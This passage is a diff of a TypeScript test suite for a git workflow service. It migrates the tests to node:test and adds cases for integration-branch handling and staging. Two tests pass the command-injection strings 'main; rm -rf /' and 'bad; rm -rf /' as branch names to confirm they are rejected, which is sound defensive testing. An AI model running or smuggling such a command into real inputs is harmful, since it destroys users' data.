-    assertEq(svc.getMainBranch(), "main", "getMainBranch falls back to auto-detection when main_branch not set");
+    assert.deepStrictEqual(svc.getMainBranch(), "main", "getMainBranch falls back to auto-detection when main_branch not set");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── getMainBranch: ignores invalid branch names ───────────────────────
 
-  console.log("\n=== getMainBranch: ignores invalid branch name ===");
-
-  {
+  test('getMainBranch: ignores invalid branch name', () => {
     const repo = initBranchTestRepo();
     const svc = new GitServiceImpl(repo, { main_branch: "main; rm -rf /" });
 
-    assertEq(svc.getMainBranch(), "main", "getMainBranch ignores invalid branch name and falls back to auto-detection");
+    assert.deepStrictEqual(svc.getMainBranch(), "main", "getMainBranch ignores invalid branch name and falls back to auto-detection");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── PreMergeCheckResult type export compile check ─────────────────────
 
-  console.log("\n=== PreMergeCheckResult type export ===");
-
-  {
+  test('PreMergeCheckResult type export', () => {
     const _checkResult: PreMergeCheckResult = { passed: true, skipped: false };
-    assertTrue(true, "PreMergeCheckResult type exported and usable");
-  }
+    assert.ok(true, "PreMergeCheckResult type exported and usable");
+  });
 
   // ═══════════════════════════════════════════════════════════════════════
   // Integration branch — feature-branch workflow support
@@ -860,82 +851,119 @@ async function main(): Promise<void> {
 
   // ─── writeIntegrationBranch / readIntegrationBranch: round-trip ────────
 
-  console.log("\n=== Integration branch: write and read ===");
-
-  {
+  test('Integration branch: write and read', () => {
     const repo = initBranchTestRepo();
 
     // Initially no integration branch
-    assertEq(readIntegrationBranch(repo, "M001"), null, "readIntegrationBranch returns null when no metadata");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "readIntegrationBranch returns null when no metadata");
 
     // Write integration branch
     writeIntegrationBranch(repo, "M001", "f-123-new-thing");
-    assertEq(readIntegrationBranch(repo, "M001"), "f-123-new-thing", "readIntegrationBranch returns written branch");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "f-123-new-thing", "readIntegrationBranch returns written branch");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── writeIntegrationBranch: updates when branch changes (#300) ──────
 
-  console.log("\n=== Integration branch: updates on branch change ===");
-
-  {
+  test('Integration branch: updates on branch change', () => {
     const repo = initBranchTestRepo();
 
     writeIntegrationBranch(repo, "M001", "f-123-first");
     writeIntegrationBranch(repo, "M001", "f-456-second"); // updates to new branch (#300)
 
-    assertEq(readIntegrationBranch(repo, "M001"), "f-456-second", "second write updates integration branch to new value");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "f-456-second", "second write updates integration branch to new value");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── writeIntegrationBranch: same branch is idempotent ─────────────────
 
-  console.log("\n=== Integration branch: same branch is idempotent ===");
-
-  {
+  test('Integration branch: same branch is idempotent', () => {
     const repo = initBranchTestRepo();
 
     writeIntegrationBranch(repo, "M001", "f-123-first");
     writeIntegrationBranch(repo, "M001", "f-123-first"); // same branch — no-op
 
-    assertEq(readIntegrationBranch(repo, "M001"), "f-123-first", "same branch write is idempotent");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "f-123-first", "same branch write is idempotent");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── writeIntegrationBranch: rejects slice branches ───────────────────
 
-  console.log("\n=== Integration branch: rejects slice branches ===");
-
-  {
+  test('Integration branch: rejects slice branches', () => {
     const repo = initBranchTestRepo();
 
     writeIntegrationBranch(repo, "M001", "gsd/M001/S01");
-    assertEq(readIntegrationBranch(repo, "M001"), null, "slice branches are not recorded as integration branch");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "slice branches are not recorded as integration branch");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
+
+  // ─── writeIntegrationBranch: rejects workflow-template branches (#2498) ─
+
+  test('Integration branch: rejects workflow-template branches', () => {
+    const repo = initBranchTestRepo();
+
+    // All 8 registered workflow templates should be rejected
+    writeIntegrationBranch(repo, "M001", "gsd/hotfix/fix-login");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "hotfix branch is not recorded");
+
+    writeIntegrationBranch(repo, "M001", "gsd/bugfix/null-pointer");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "bugfix branch is not recorded");
+
+    writeIntegrationBranch(repo, "M001", "gsd/small-feature/add-button");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "small-feature branch is not recorded");
+
+    writeIntegrationBranch(repo, "M001", "gsd/refactor/rename-module");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "refactor branch is not recorded");
+
+    writeIntegrationBranch(repo, "M001", "gsd/spike/evaluate-lib");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "spike branch is not recorded");
+
+    writeIntegrationBranch(repo, "M001", "gsd/security-audit/owasp-scan");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "security-audit branch is not recorded");
+
+    writeIntegrationBranch(repo, "M001", "gsd/dep-upgrade/bump-react");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "dep-upgrade branch is not recorded");
+
+    writeIntegrationBranch(repo, "M001", "gsd/full-project/new-app");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "full-project branch is not recorded");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
+
+  // ─── writeIntegrationBranch: still records legitimate branches ────────
+
+  test('Integration branch: records non-ephemeral gsd branches', () => {
+    const repo = initBranchTestRepo();
+
+    // A normal feature branch should still be recorded
+    writeIntegrationBranch(repo, "M001", "feature/new-thing");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "feature/new-thing", "normal branches are recorded");
+
+    // The main branch should be recorded
+    writeIntegrationBranch(repo, "M002", "main");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M002"), "main", "main branch is recorded");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
 
   // ─── writeIntegrationBranch: rejects invalid branch names ─────────────
 
-  console.log("\n=== Integration branch: rejects invalid names ===");
-
-  {
+  test('Integration branch: rejects invalid names', () => {
     const repo = initBranchTestRepo();
 
     writeIntegrationBranch(repo, "M001", "bad; rm -rf /");
-    assertEq(readIntegrationBranch(repo, "M001"), null, "invalid branch name is not recorded");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "invalid branch name is not recorded");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── getMainBranch: uses integration branch when milestone set ────────
 
-  console.log("\n=== getMainBranch: integration branch from milestone metadata ===");
-
-  {
+  test('getMainBranch: integration branch from milestone metadata', () => {
     const repo = initBranchTestRepo();
 
     // Create a feature branch
@@ -947,20 +975,18 @@ async function main(): Promise<void> {
 
     // Without milestone set, getMainBranch returns "main"
     const svc = new GitServiceImpl(repo);
-    assertEq(svc.getMainBranch(), "main", "getMainBranch returns main when no milestone set");
+    assert.deepStrictEqual(svc.getMainBranch(), "main", "getMainBranch returns main when no milestone set");
 
     // With milestone set, getMainBranch returns the integration branch
     svc.setMilestoneId("M001");
-    assertEq(svc.getMainBranch(), "f-123-feature", "getMainBranch returns integration branch when milestone set");
+    assert.deepStrictEqual(svc.getMainBranch(), "f-123-feature", "getMainBranch returns integration branch when milestone set");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── getMainBranch: main_branch pref still takes priority ─────────────
 
-  console.log("\n=== getMainBranch: main_branch pref overrides integration branch ===");
-
-  {
+  test('getMainBranch: main_branch pref overrides integration branch', () => {
     const repo = initBranchTestRepo();
 
     run("git checkout -b f-123-feature", repo);
@@ -972,16 +998,14 @@ async function main(): Promise<void> {
     // Explicit preference still wins
     const svc = new GitServiceImpl(repo, { main_branch: "trunk" });
     svc.setMilestoneId("M001");
-    assertEq(svc.getMainBranch(), "trunk", "main_branch preference overrides integration branch");
+    assert.deepStrictEqual(svc.getMainBranch(), "trunk", "main_branch preference overrides integration branch");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── getMainBranch: falls back when integration branch deleted ────────
 
-  console.log("\n=== getMainBranch: fallback when integration branch deleted ===");
-
-  {
+  test('getMainBranch: fallback when integration branch deleted', () => {
     const repo = initBranchTestRepo();
 
     // Write metadata pointing to a branch that doesn't exist
@@ -989,75 +1013,67 @@ async function main(): Promise<void> {
 
     const svc = new GitServiceImpl(repo);
     svc.setMilestoneId("M001");
-    assertEq(svc.getMainBranch(), "main", "getMainBranch falls back to main when integration branch no longer exists");
+    assert.deepStrictEqual(svc.getMainBranch(), "main", "getMainBranch falls back to main when integration branch no longer exists");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── resolveMilestoneIntegrationBranch: recorded branch wins when it exists ───
 
-  console.log("\n=== Integration branch: resolver prefers recorded branch ===");
-
-  {
+  test('Integration branch: resolver prefers recorded branch', () => {
     const repo = initBranchTestRepo();
     run("git checkout -b feature/live", repo);
     run("git checkout main", repo);
     writeIntegrationBranch(repo, "M001", "feature/live");
 
     const resolved = resolveMilestoneIntegrationBranch(repo, "M001");
-    assertEq(resolved.status, "recorded", "resolver reports recorded branch when metadata branch exists");
-    assertEq(resolved.recordedBranch, "feature/live", "resolver includes recorded branch");
-    assertEq(resolved.effectiveBranch, "feature/live", "resolver uses recorded branch as effective branch");
+    assert.deepStrictEqual(resolved.status, "recorded", "resolver reports recorded branch when metadata branch exists");
+    assert.deepStrictEqual(resolved.recordedBranch, "feature/live", "resolver includes recorded branch");
+    assert.deepStrictEqual(resolved.effectiveBranch, "feature/live", "resolver uses recorded branch as effective branch");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── resolveMilestoneIntegrationBranch: falls back to detected default ────────
 
-  console.log("\n=== Integration branch: resolver falls back to detected default ===");
-
-  {
+  test('Integration branch: resolver falls back to detected default', () => {
     const repo = initBranchTestRepo();
     writeIntegrationBranch(repo, "M001", "deleted-branch");
 
     const resolved = resolveMilestoneIntegrationBranch(repo, "M001");
-    assertEq(resolved.status, "fallback", "resolver reports fallback when recorded branch is stale");
-    assertEq(resolved.recordedBranch, "deleted-branch", "resolver preserves stale recorded branch for diagnostics");
-    assertEq(resolved.effectiveBranch, "main", "resolver falls back to detected default branch");
-    assertTrue(
+    assert.deepStrictEqual(resolved.status, "fallback", "resolver reports fallback when recorded branch is stale");
+    assert.deepStrictEqual(resolved.recordedBranch, "deleted-branch", "resolver preserves stale recorded branch for diagnostics");
+    assert.deepStrictEqual(resolved.effectiveBranch, "main", "resolver falls back to detected default branch");
+    assert.ok(
       resolved.reason.includes("deleted-branch") && resolved.reason.includes("main"),
       "resolver reason mentions stale recorded branch and fallback branch",
     );
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── resolveMilestoneIntegrationBranch: configured main_branch is fallback ─────
 
-  console.log("\n=== Integration branch: resolver uses configured fallback branch ===");
-
-  {
+  test('Integration branch: resolver uses configured fallback branch', () => {
     const repo = initBranchTestRepo();
     run("git checkout -b trunk", repo);
     run("git checkout main", repo);
     writeIntegrationBranch(repo, "M001", "deleted-branch");
 
     const resolved = resolveMilestoneIntegrationBranch(repo, "M001", { main_branch: "trunk" });
-    assertEq(resolved.status, "fallback", "resolver reports fallback when using configured main_branch");
-    assertEq(resolved.effectiveBranch, "trunk", "resolver prefers configured main_branch as fallback");
-    assertTrue(
+    assert.deepStrictEqual(resolved.status, "fallback", "resolver reports fallback when using configured main_branch");
+    assert.deepStrictEqual(resolved.effectiveBranch, "trunk", "resolver prefers configured main_branch as fallback");
+    assert.ok(
       resolved.reason.includes("deleted-branch") && resolved.reason.includes("trunk"),
       "configured fallback reason mentions stale branch and configured branch",
     );
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── Per-milestone isolation: different milestones, different targets ──
 
-  console.log("\n=== Integration branch: per-milestone isolation ===");
-
-  {
+  test('Integration branch: per-milestone isolation', () => {
     const repo = initBranchTestRepo();
 
     run("git checkout -b feature-a", repo);
@@ -1070,42 +1086,38 @@ async function main(): Promise<void> {
     const svc = new GitServiceImpl(repo);
 
     svc.setMilestoneId("M001");
-    assertEq(svc.getMainBranch(), "feature-a", "M001 integration branch is feature-a");
+    assert.deepStrictEqual(svc.getMainBranch(), "feature-a", "M001 integration branch is feature-a");
 
     svc.setMilestoneId("M002");
-    assertEq(svc.getMainBranch(), "feature-b", "M002 integration branch is feature-b");
+    assert.deepStrictEqual(svc.getMainBranch(), "feature-b", "M002 integration branch is feature-b");
 
     svc.setMilestoneId(null);
-    assertEq(svc.getMainBranch(), "main", "no milestone set → falls back to main");
+    assert.deepStrictEqual(svc.getMainBranch(), "main", "no milestone set → falls back to main");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── Backward compatibility: no metadata → existing behavior ──────────
 
-  console.log("\n=== Integration branch: backward compat ===");
-
-  {
+  test('Integration branch: backward compat', () => {
     const repo = initBranchTestRepo();
     const svc = new GitServiceImpl(repo);
 
     // Set milestone but no metadata file exists
     svc.setMilestoneId("M001");
-    assertEq(svc.getMainBranch(), "main", "backward compat: no metadata file → falls back to main");
+    assert.deepStrictEqual(svc.getMainBranch(), "main", "backward compat: no metadata file → falls back to main");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── untrackRuntimeFiles: removes tracked runtime files from index ───
 
-  console.log("\n=== untrackRuntimeFiles ===");
-
-  {
-    const { untrackRuntimeFiles } = await import("../gitignore.ts");
+  test('untrackRuntimeFiles', async () => {
+    const { untrackRuntimeFiles } = await import("../../gitignore.ts");
     const repo = mkdtempSync(join(tmpdir(), "gsd-untrack-"));
-    run("git init -b main", repo);
-    run("git config user.email test@test.com", repo);
-    run("git config user.name Test", repo);
+    runGit(repo, ["init", "-b", "main"]);
+    runGit(repo, ["config", "user.email", "test@test.com"]);
+    runGit(repo, ["config", "user.name", "Test"]);
 
     // Create and track runtime files (simulates pre-.gitignore state)
     mkdirSync(join(repo, ".gsd", "activity"), { recursive: true });
@@ -1116,56 +1128,55 @@ async function main(): Promise<void> {
     writeFileSync(join(repo, ".gsd", "activity", "log.jsonl"), "{}");
     writeFileSync(join(repo, ".gsd", "runtime", "data.json"), "{}");
     writeFileSync(join(repo, "src.ts"), "code");
-    run("git add -A", repo);
-    run("git commit -m init", repo);
+    runGit(repo, ["add", "-A"]);
+    runGit(repo, ["commit", "-m", "init"]);
 
     // Precondition: runtime files are tracked
     const trackedBefore = run("git ls-files .gsd/", repo);
-    assertTrue(trackedBefore.includes("completed-units.json"), "untrack: precondition — completed-units tracked");
-    assertTrue(trackedBefore.includes("metrics.json"), "untrack: precondition — metrics tracked");
+    assert.ok(trackedBefore.includes("completed-units.json"), "untrack: precondition — completed-units tracked");
+    assert.ok(trackedBefore.includes("metrics.json"), "untrack: precondition — metrics tracked");
 
     // Run untrackRuntimeFiles
     untrackRuntimeFiles(repo);
 
     // Runtime files should be removed from the index
     const trackedAfter = run("git ls-files .gsd/", repo);
-    assertEq(trackedAfter, "", "untrack: all runtime files removed from index");
+    assert.deepStrictEqual(trackedAfter, "", "untrack: all runtime files removed from index");
 
     // Non-runtime files remain tracked
     const srcTracked = run("git ls-files src.ts", repo);
-    assertTrue(srcTracked.includes("src.ts"), "untrack: non-runtime files remain tracked");
+    assert.ok(srcTracked.includes("src.ts"), "untrack: non-runtime files remain tracked");
 
     // Files still exist on disk
-    assertTrue(existsSync(join(repo, ".gsd", "completed-units.json")),
+    assert.ok(existsSync(join(repo, ".gsd", "completed-units.json")),
       "untrack: completed-units.json still on disk");
-    assertTrue(existsSync(join(repo, ".gsd", "metrics.json")),
+    assert.ok(existsSync(join(repo, ".gsd", "metrics.json")),
       "untrack: metrics.json still on disk");
 
     // Idempotent — running again doesn't error
     untrackRuntimeFiles(repo);
-    assertTrue(true, "untrack: second call is idempotent (no error)");
+    assert.ok(true, "untrack: second call is idempotent (no error)");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── smartStage excludes runtime files but allows milestone artifacts ──
 
-  console.log("\n=== smartStage excludes runtime files, allows milestone artifacts ===");
-
-  {
+  test('smartStage excludes runtime files, allows milestone artifacts', () => {
     const repo = mkdtempSync(join(tmpdir(), "gsd-smart-stage-excludes-"));
-    run("git init -b main", repo);
-    run("git config user.email test@test.com", repo);
-    run("git config user.name Test", repo);
+    runGit(repo, ["init", "-b", "main"]);
+    runGit(repo, ["config", "user.email", "test@test.com"]);
+    runGit(repo, ["config", "user.name", "Test"]);
     writeFileSync(join(repo, "README.md"), "init");
-    run("git add -A && git commit -m init", repo);
+    runGit(repo, ["add", "-A"]);
+    runGit(repo, ["commit", "-m", "init"]);
 
     // Create .gsd/ runtime files + milestone artifacts + a normal source file
     mkdirSync(join(repo, ".gsd", "milestones", "M001"), { recursive: true });
     mkdirSync(join(repo, ".gsd", "runtime"), { recursive: true });
     mkdirSync(join(repo, ".gsd", "activity"), { recursive: true });
     writeFileSync(join(repo, ".gsd", "milestones", "M001", "ROADMAP.md"), "# Roadmap");
-    writeFileSync(join(repo, ".gsd", "preferences.md"), "---\nversion: 1\n---");
+    writeFileSync(join(repo, ".gsd", "PREFERENCES.md"), "---\nversion: 1\n---");
     writeFileSync(join(repo, ".gsd", "STATE.md"), "# State");
     writeFileSync(join(repo, ".gsd", "runtime", "units.json"), "{}");
     writeFileSync(join(repo, ".gsd", "activity", "log.jsonl"), "{}");
@@ -1174,74 +1185,68 @@ async function main(): Promise<void> {
     // smartStage excludes only runtime paths, not all of .gsd/ (#1326)
     const svc = new GitServiceImpl(repo);
     const msg = svc.commit({ message: "test commit" });
-    assertTrue(msg !== null, "smartStage: commit succeeds");
+    assert.ok(msg !== null, "smartStage: commit succeeds");
 
     const committed = run("git show --name-only HEAD", repo);
-    assertTrue(committed.includes("src.ts"), "smartStage: source files ARE in commit");
+    assert.ok(committed.includes("src.ts"), "smartStage: source files ARE in commit");
     // Runtime files should NOT be committed
-    assertTrue(!committed.includes(".gsd/STATE.md"), "smartStage: STATE.md excluded (runtime)");
-    assertTrue(!committed.includes(".gsd/runtime/"), "smartStage: runtime/ excluded");
-    assertTrue(!committed.includes(".gsd/activity/"), "smartStage: activity/ excluded");
+    assert.ok(!committed.includes(".gsd/STATE.md"), "smartStage: STATE.md excluded (runtime)");
+    assert.ok(!committed.includes(".gsd/runtime/"), "smartStage: runtime/ excluded");
+    assert.ok(!committed.includes(".gsd/activity/"), "smartStage: activity/ excluded");
     // Milestone artifacts SHOULD be committed when not gitignored (#1326)
-    assertTrue(committed.includes(".gsd/milestones/"), "smartStage: milestone artifacts ARE committed");
+    assert.ok(committed.includes(".gsd/milestones/"), "smartStage: milestone artifacts ARE committed");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── writeIntegrationBranch: no commit (metadata in external storage) ──
 
-  console.log("\n=== writeIntegrationBranch: no commit ===");
-
-  {
+  test('writeIntegrationBranch: no commit', () => {
     const repo = initBranchTestRepo();
     const commitsBefore = run("git rev-list --count HEAD", repo);
 
     writeIntegrationBranch(repo, "M001", "f-123-new-thing");
 
     // File should still be written to disk
-    assertEq(readIntegrationBranch(repo, "M001"), "f-123-new-thing",
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "f-123-new-thing",
       "writeIntegrationBranch: metadata file exists on disk");
 
     // No commit — .gsd/ is managed externally
     const commitsAfter = run("git rev-list --count HEAD", repo);
-    assertEq(commitsBefore, commitsAfter,
+    assert.deepStrictEqual(commitsBefore, commitsAfter,
       "writeIntegrationBranch: no git commit created for integration branch");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── ensureGitignore: always adds .gsd to gitignore ──────────────────
 
-  console.log("\n=== ensureGitignore: adds .gsd entry ===");
-
-  {
-    const { ensureGitignore } = await import("../gitignore.ts");
+  test('ensureGitignore: adds .gsd entry', async () => {
+    const { ensureGitignore } = await import("../../gitignore.ts");
     const repo = mkdtempSync(join(tmpdir(), "gsd-gitignore-external-state-"));
 
     // Should add .gsd to gitignore (external state dir is a symlink)
     const modified = ensureGitignore(repo);
-    assertTrue(modified, "ensureGitignore: gitignore was modified");
+    assert.ok(modified, "ensureGitignore: gitignore was modified");
 
     const { readFileSync } = await import("node:fs");
     const content = readFileSync(join(repo, ".gitignore"), "utf-8");
     const lines = content.split("\n").map(l => l.trim()).filter(l => l && !l.startsWith("#"));
-    assertTrue(lines.includes(".gsd"), "ensureGitignore: .gitignore contains .gsd");
+    assert.ok(lines.includes(".gsd"), "ensureGitignore: .gitignore contains .gsd");
 
     // Idempotent — calling again doesn't add duplicates
     const modified2 = ensureGitignore(repo);
-    assertTrue(!modified2, "ensureGitignore: second call is idempotent");
+    assert.ok(!modified2, "ensureGitignore: second call is idempotent");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── nativeAddAllWithExclusions: symlinked .gsd fallback ───────────────
 
-  console.log("\n=== nativeAddAllWithExclusions: symlinked .gsd fallback ===");
-
-  {
+  test('nativeAddAllWithExclusions: symlinked .gsd fallback', () => {
     // When .gsd is a symlink, git rejects `:!.gsd/...` pathspecs with
     // "fatal: pathspec '...' is beyond a symbolic link". The fix falls
-    // back to plain `git add -A`, which respects .gitignore.
+    // back to `git add -u` (tracked files only), NOT `git add -A`.
     const repo = initTempRepo();
 
     // Create the real .gsd directory outside the repo, then symlink it
@@ -1253,11 +1258,18 @@ async function main(): Promise<void> {
     // Symlink .gsd -> external directory
     symlinkSync(externalGsd, join(repo, ".gsd"));
 
-    // Add .gitignore so git add -A fallback skips .gsd/
+    // Add .gitignore so .gsd/ is ignored
     writeFileSync(join(repo, ".gitignore"), ".gsd\n");
 
-    // Create a real file that should be staged
+    // Create a tracked file and commit it, then modify it
     createFile(repo, "src/app.ts", "export const x = 1;");
+    run("git add -A", repo);
+    run('git commit -m "add app"', repo);
+    writeFileSync(join(repo, "src/app.ts"), "export const x = 2;");
+
+    // Create an untracked file simulating large data (NOT in .gitignore)
+    // This is the key scenario: large untracked dirs that git add -A would traverse
+    createFile(repo, "data/large-model.bin", "pretend this is 10GB");
 
     // nativeAddAllWithExclusions should NOT throw despite .gsd being a symlink
     let threw = false;
@@ -1267,22 +1279,26 @@ async function main(): Promise<void> {
       threw = true;
       console.error("  unexpected error:", e);
     }
-    assertTrue(!threw, "nativeAddAllWithExclusions does not throw with symlinked .gsd");
+    assert.ok(!threw, "nativeAddAllWithExclusions does not throw with symlinked .gsd");
 
-    // Verify the real file was staged
+    // Verify the tracked modified file was staged
     const staged = run("git diff --cached --name-only", repo);
-    assertTrue(staged.includes("src/app.ts"), "real file staged despite symlinked .gsd");
-    assertTrue(!staged.includes(".gsd"), ".gsd content not staged");
+    assert.ok(staged.includes("src/app.ts"), "modified tracked file staged despite symlinked .gsd");
+
+    // CRITICAL: untracked files must NOT be staged — the symlink fallback
+    // should use `git add -u` (tracked only), not `git add -A` (all files).
+    // Using `git add -A` on a repo with large untracked data dirs hangs. (#1977)
+    assert.ok(!staged.includes("data/large-model.bin"),
+      "symlink fallback must not stage untracked files (would hang on large repos)");
+    assert.ok(!staged.includes(".gsd"), ".gsd content not staged");
 
     rmSync(repo, { recursive: true, force: true });
     rmSync(externalGsd, { recursive: true, force: true });
-  }
+  });
 
   // ─── nativeAddAllWithExclusions: non-symlinked .gsd still works ───────
 
-  console.log("\n=== nativeAddAllWithExclusions: non-symlinked .gsd still works ===");
-
-  {
+  test('nativeAddAllWithExclusions: non-symlinked .gsd still works', () => {
     // Verify the normal (non-symlink) case still works with pathspec exclusions
     const repo = initTempRepo();
 
@@ -1296,96 +1312,96 @@ async function main(): Promise<void> {
     } catch {
       threw = true;
     }
-    assertTrue(!threw, "nativeAddAllWithExclusions works with normal .gsd directory");
+    assert.ok(!threw, "nativeAddAllWithExclusions works with normal .gsd directory");
 
     const staged = run("git diff --cached --name-only", repo);
-    assertTrue(staged.includes("src/code.ts"), "real file staged with normal .gsd");
+    assert.ok(staged.includes("src/code.ts"), "real file staged with normal .gsd");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── MergeConflictError: constructor fields ───────────────────────────────
 
-  console.log("\n=== MergeConflictError: constructor fields ===");
-  {
+  test('MergeConflictError: constructor fields', () => {
     const err = new MergeConflictError(
       ["src/foo.ts", "src/bar.ts"],
       "squash",
       "gsd/M001/S01",
       "main",
     );
-    assertEq(err.conflictedFiles, ["src/foo.ts", "src/bar.ts"], "MergeConflictError.conflictedFiles populated");
-    assertEq(err.strategy, "squash", "MergeConflictError.strategy set");
-    assertEq(err.branch, "gsd/M001/S01", "MergeConflictError.branch set");
-    assertEq(err.mainBranch, "main", "MergeConflictError.mainBranch set");
-    assertEq(err.name, "MergeConflictError", "MergeConflictError.name is MergeConflictError");
-    assertTrue(err.message.includes("src/foo.ts"), "MergeConflictError message lists conflicted files");
-    assertTrue(err.message.toLowerCase().includes("squash"), "MergeConflictError message mentions strategy");
-    assertTrue(err instanceof MergeConflictError, "MergeConflictError is an instanceof MergeConflictError");
-    assertTrue(err instanceof Error, "MergeConflictError is an Error instance");
-  }
+    assert.deepStrictEqual(err.conflictedFiles, ["src/foo.ts", "src/bar.ts"], "MergeConflictError.conflictedFiles populated");
+    assert.deepStrictEqual(err.strategy, "squash", "MergeConflictError.strategy set");
+    assert.deepStrictEqual(err.branch, "gsd/M001/S01", "MergeConflictError.branch set");
+    assert.deepStrictEqual(err.mainBranch, "main", "MergeConflictError.mainBranch set");
+    assert.deepStrictEqual(err.name, "MergeConflictError", "MergeConflictError.name is MergeConflictError");
+    assert.ok(err.message.includes("src/foo.ts"), "MergeConflictError message lists conflicted files");
+    assert.ok(err.message.toLowerCase().includes("squash"), "MergeConflictError message mentions strategy");
+    assert.ok(err instanceof MergeConflictError, "MergeConflictError is an instanceof MergeConflictError");
+    assert.ok(err instanceof Error, "MergeConflictError is an Error instance");
+  });
 
   // ─── Integration branch: rejects gsd/quick/* branches ────────────────────
 
-  console.log("\n=== Integration branch: rejects gsd/quick/* branches ===");
-  {
+  test('Integration branch: rejects gsd/quick/* branches', () => {
     const repo = initBranchTestRepo();
 
     writeIntegrationBranch(repo, "M001", "gsd/quick/1234-some-task");
-    assertEq(readIntegrationBranch(repo, "M001"), null, "gsd/quick/* branches are not recorded as integration branch");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null, "gsd/quick/* branches are not recorded as integration branch");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── Integration branch: resolver returns missing when no metadata ────────
 
-  console.log("\n=== Integration branch: resolver returns missing when no metadata ===");
-  {
+  test('Integration branch: resolver returns missing when no metadata', () => {
     const repo = initBranchTestRepo();
 
     // No writeIntegrationBranch call — no metadata file exists
     const resolved = resolveMilestoneIntegrationBranch(repo, "M999");
-    assertEq(resolved.status, "missing", "resolver reports missing when no metadata file");
-    assertEq(resolved.recordedBranch, null, "resolver recordedBranch is null when no metadata");
-    assertEq(resolved.effectiveBranch, null, "resolver effectiveBranch is null when no metadata");
-    assertTrue(resolved.reason.includes("M999"), "resolver reason mentions the milestone ID");
+    assert.deepStrictEqual(resolved.status, "missing", "resolver reports missing when no metadata file");
+    assert.deepStrictEqual(resolved.recordedBranch, null, "resolver recordedBranch is null when no metadata");
+    assert.deepStrictEqual(resolved.effectiveBranch, null, "resolver effectiveBranch is null when no metadata");
+    assert.ok(resolved.reason.includes("M999"), "resolver reason mentions the milestone ID");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── Integration branch: resolver missing when both recorded and configured branches gone ───
 
-  console.log("\n=== Integration branch: resolver missing when both recorded and configured branches gone ===");
-  {
+  test('Integration branch: resolver missing when both recorded and configured branches gone', () => {
     const repo = initBranchTestRepo();
 
     // Record a branch that doesn't exist
     writeIntegrationBranch(repo, "M001", "deleted-feature");
     // configured main_branch also doesn't exist
     const resolved = resolveMilestoneIntegrationBranch(repo, "M001", { main_branch: "nonexistent-branch" });
-    assertEq(resolved.status, "missing", "resolver reports missing when recorded branch and configured main_branch both absent");
-    assertEq(resolved.recordedBranch, "deleted-feature", "resolver preserves stale recorded branch");
-    assertEq(resolved.effectiveBranch, null, "resolver effectiveBranch is null when no safe fallback");
-    assertTrue(
+    assert.deepStrictEqual(resolved.status, "missing", "resolver reports missing when recorded branch and configured main_branch both absent");
+    assert.deepStrictEqual(resolved.recordedBranch, "deleted-feature", "resolver preserves stale recorded branch");
+    assert.deepStrictEqual(resolved.effectiveBranch, null, "resolver effectiveBranch is null when no safe fallback");
+    assert.ok(
       resolved.reason.includes("deleted-feature") && resolved.reason.includes("nonexistent-branch"),
       "reason mentions both stale branch and unavailable configured branch",
     );
 
     rmSync(repo, { recursive: true, force: true });
-  }
+  });
 
   // ─── buildTaskCommitMessage: issueNumber appends Resolves trailer ─────────
 
-  console.log("\n=== buildTaskCommitMessage: issueNumber appends Resolves trailer ===");
-  {
+  test('buildTaskCommitMessage: issueNumber appends Resolves trailer', () => {
     const msg = buildTaskCommitMessage({
       taskId: "S01/T03",
       taskTitle: "fix login redirect",
       issueNumber: 42,
     });
-    assertTrue(msg.includes("Resolves #42"), "buildTaskCommitMessage includes Resolves #N trailer when issueNumber is set");
-    assertTrue(msg.startsWith("fix(S01/T03):"), "buildTaskCommitMessage infers fix type");
-  }
+    assert.ok(msg.includes("Resolves #42"), "buildTaskCommitMessage includes Resolves #N trailer when issueNumber is set");
+    assert.ok(msg.startsWith("fix:"), "buildTaskCommitMessage infers fix type");
+    assert.ok(msg.includes("GSD-Task: S01/T03"), "GSD-Task trailer present");
